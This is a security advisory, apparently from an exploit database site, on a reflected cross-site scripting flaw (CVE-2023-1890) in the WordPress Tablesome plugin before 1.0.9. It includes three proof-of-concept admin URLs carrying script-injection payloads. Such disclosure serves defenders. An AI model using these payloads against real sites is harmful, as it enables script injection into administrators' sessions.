WordPress Tablesome Cross Site Scripting

2023.07.27
Credit: Taurus Omar
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79

Tittle: WordPress Plugin Tablesome < 1.0.9 - Reflected XSS References: CVE-2023-1890 Author: Taurus Omar Description: The plugin does not escape various generated URLs, before outputting them in attributes when some notices are displayed, leading to Reflected Cross-Site Scripting Affects Plugins: Tablesome - Fixed in version 1.0.9 Proof of Concept: Make a logged in admin open one of the URL below when the feature/tracking notice has not been dismissed yet https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&a%22%3E%27%3E%3Cdetails%2Fopen%2Fontoggle%3Dconfirm%28%27XSS%27%29%3E https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&tablesome_feature_notice_dismissed=1&</script><script>alert(/XSS/)</script> https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&can_track_tablesome_events=1&</script><script>alert(/XSS/)</script> Classification: Type XSS OWASP top 10 A7: Cross-Site Scripting (XSS) CWE-79 wpScan: https://wpscan.com/vulnerability/8ef64490-30cd-4e07-9b7c-64f551944f3d


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top